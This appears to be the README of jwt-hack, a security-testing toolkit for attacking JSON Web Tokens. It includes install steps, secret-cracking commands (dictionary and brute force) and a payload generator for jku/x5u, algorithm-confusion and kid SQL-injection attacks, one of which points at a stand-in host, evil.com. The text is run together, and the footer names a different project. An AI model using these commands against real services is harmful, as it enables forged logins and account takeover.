JSON Web Token Hack Toolkit
A high-performance toolkit for testing, analyzing and attacking JSON Web Tokens.
cargo install jwt-hackbrew install jwt-hacksudo snap install jwt-hackgit clone https://github.com/hahwul/jwt-hack
cd jwt-hack
cargo install --path .docker pull ghcr.io/hahwul/jwt-hack:latestdocker pull hahwul/jwt-hack:v2.0.0| Mode | Description | Support |
|---|---|---|
| Encode | JWT Encoder | Secret based / Key based / Algorithm / Custom Header |
| Decode | JWT Decoder | Algorithm, Issued At Check |
| Verify | JWT Verifier | Secret based / Key based (for asymmetric algorithms) |
| Crack | Secret Cracker | Dictionary Attack / Brute Force |
| Payload | JWT Attack Payload Generator | none / jku&x5u / alg_confusion / kid_sql / x5c / cty |
jwt-hack decode eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxMjM0In0.CHANGED# With Secret
jwt-hack encode '{"sub":"1234"}' --secret=your-secret
# With Private Key
ssh-keygen -t rsa -b 4096 -E SHA256 -m PEM -P "" -f RS256.key
jwt-hack encode '{"a":"z"}' --private-key RS256.key --algorithm=RS256Checks if a JWT's signature is valid using the provided secret or key.
# With Secret (HMAC algorithms like HS256, HS384, HS512)
jwt-hack verify YOUR_JWT_TOKEN_HERE --secret=your-256-bit-secret
# With Private Key (for asymmetric algorithms like RS256, ES256)
jwt-hack verify YOUR_JWT_TOKEN_HERE --private-key path/to/your/RS256_private.key# Dictionary attack
jwt-hack crack -w wordlist.txt JWT_TOKEN
# Bruteforce attack
jwt-hack crack -m brute JWT_TOKEN --max=4jwt-hack payload JWT_TOKEN --jwk-attack evil.com --jwk-trust trusted.comUrx is open-source project and made it with ❤️ if you want contribute this project, please see CONTRIBUTING.md and Pull-Request with cool your contents.
![@github-actions[bot]](https://avatars.githubusercontent.com/in/15368?s=64&v=4){kind=small}
![@dependabot[bot]](https://avatars.githubusercontent.com/in/29110?s=64&v=4){kind=small}
![@google-labs-jules[bot]](https://avatars.githubusercontent.com/in/842251?s=64&v=4){kind=small}
